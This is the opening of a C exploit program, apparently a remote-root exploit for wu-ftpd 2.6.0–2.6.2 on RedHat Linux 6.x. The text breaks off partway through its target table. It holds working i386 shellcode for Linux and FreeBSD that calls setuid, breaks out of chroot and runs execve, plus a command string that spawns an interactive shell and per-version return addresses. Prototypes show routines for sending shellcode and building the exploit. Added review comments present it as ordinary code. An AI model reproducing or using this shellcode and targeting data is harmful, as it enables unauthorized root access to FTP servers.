#define VERSION "v0.0.5"
#include
#include
#include
#include
#include
#include
#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH_LINUX 15
#define DEF_ANSH_FRBSD 55
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR_LINUX "/home/"
#define HOME_DIR_FRBSD "/usr/home/"
#define HOME_DIR_OPBSD "/home/"
#define DEF_HOST "localhost"
#define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec bash -i\n"
#define DEF_COMM_OB "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec sh -i\n"
/* ftpd handshake */
#define FTP_CONN_SCS "220"
#define FTP_USER_FAD "331"
#define FTP_LOGIN_FAD "530 Login incorrect."
#define FTP_LOGIN_SCS "230"
#define CWD_COMM_SCS "250" /* also, RMD command */
#define MKD_COMM_SCS "257"
#define MKD_EXIST "521"
#define CMD_ERROR "500"
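/*
** Forward declarations for the functions defined later in this file.
** NOTE(review): the definitions are not in this chunk, so the roles below are
** inferred from names/parameter types only — confirm against the bodies.
** The `int' returns presumably use the NRL/SCS/FAD codes defined above.
*/
void ftpd_login(int sock, char *user, char *pass);      /* FTP login dialogue on sock (presumably) */
void conn_shell(int conn_sock, u_long scs_addr);
int setsock(char *u_host, int u_port);                   /* returns a socket for host/port (presumably) */
void re_connt(int st_sock_va);
void prcode_usage(char *f_nm);                           /* usage text; f_nm presumably argv[0] */
int mkd_cwd_f(int sock, int type, char *dir_nm, int gb_character);
int send_shellcode(int sock, int type, char *dir_nm);
void make_send_exploit(int sock, int type, u_long sh_addr, int d_type);
int make_retloc(int sock, int type, char *atk_bf, u_long sh_addr);
u_long null_chk(u_long sh_addr);
/* Was `void banrl();` — an empty parameter list in a declaration is a
** non-prototype and disables argument checking at call sites; `(void)' is
** the explicit zero-argument prototype (compatible with a `banrl()' definition
** that takes no parameters). */
void banrl(void);
int bscann(char *chk_ban);                               /* banner check; see b_scan below */
int check_exp(int sock);                                 /* exploit test; see __exp_test below */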
/*
** One row of the plat[] target table below. plat[] uses positional
** initializers, so the field order here is part of the table format —
** do not reorder fields without rewriting every plat[] entry.
*/
struct os
{
int num;          /* table index; the visible plat[] entries number 0, 1, 2 in order */
char *v_nm;       /* human-readable platform/version label shown in plat[] */
u_long sh_addr;   /* address; prototypes above pass a `u_long sh_addr' to make_send_exploit/make_retloc — presumably this value */
u_long bf_addr;   /* second address (0x0806a082 in all visible entries); its use is not visible in this chunk */
char *shellcode;  /* points at one of the *_shellcode_ffx2 byte arrays above */
int off_st;       /* DEF_ANSH_LINUX / DEF_ANSH_FRBSD in plat[]; meaning not visible here */
char *home;       /* HOME_DIR_* prefix string, e.g. "/home/" */
};
/* File-scope state shared by the functions declared above; all flags start at NRL. */
int t_g = NRL;
/* user home directory offset; DEF_VA is 255, so every writer must bound its copy
** by sizeof home_dir — the writers are not visible in this chunk. */
char home_dir[DEF_VA];
/* check exploit test. NOTE(review): an identifier starting with a double
** underscore is reserved for the implementation (C11 7.1.3); renaming it
** means touching every use outside this chunk, so it is kept as-is here. */
int __exp_test = NRL;
/* banner check */
int b_scan = NRL;
/*
** `0xff' is used two times to be realized in our shellcode.
*/
char lnx_shellcode_ffx2[]=
/* setuid/chroot-break/execve shellcode by Lam3rZ */
/*
** Raw i386 machine-code bytes stored as a C string literal. The exact byte
** sequence is the behaviour: never reflow, re-encode or "tidy" these lines.
** The trailing bytes 0x30 0x62 0x69 0x6e 0x30 0x73 0x68 0x31 0x2e 0x2e 0x31
** 0x31 are the ASCII text "0bin0sh1..11", a recognisable marker for this
** payload. plat[] below references this array by name.
** NOTE(review): the literal carries an implicit 0x00 terminator; sizeof counts
** it, strlen does not — check which the senders rely on (not visible here).
*/
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x43\x89"
"\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\xc9\x8d\x5e\x01"
"\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01"
"\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9"
"\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31"
"\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe"
"\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0"
"\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31"
"\x2e\x2e\x31\x31";
char bsd_shellcode_ffx2[]=
/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
/*
** Raw i386 machine-code bytes stored as a C string literal; as with the Linux
** variant above, the byte sequence must stay exact — do not reflow or edit.
** The tail is the same ASCII marker "0bin0sh1..11" (0x30 0x62 0x69 0x6e 0x30
** 0x73 0x68 0x31 0x2e 0x2e 0x31 0x31) followed by an ASCII author tag
** (0x76 0x65 0x6e 0x67 0x6c 0x69 0x6e 0x40 ...); both are recognisable
** content markers for this payload.
** NOTE(review): same implicit 0x00 terminator caveat as lnx_shellcode_ffx2.
*/
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0\x88"
"\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80\x31"
"\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31"
"\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75\xf1"
"\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd\x80"
"\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07"
"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53\x53"
"\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30"
"\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x6c\x69\x6e"
"\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x69\x65\x2e"
"\x63\x6f\x6d";
struct os plat[]=
{
/*
** I enjoy version up, will not share more. :-}
*/
{
0,"RedHat Linux 6.x Version wu-2.6.0 compile",0x0806a59c,
0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
},
{
1,"RedHat Linux 6.x Version wu-2.6.1 compile",0x0806aad8,
0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
},
{
2,"RedHat Linux 6.x Version wu-2.6.2 compile",0x0806aa60,
0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
},
{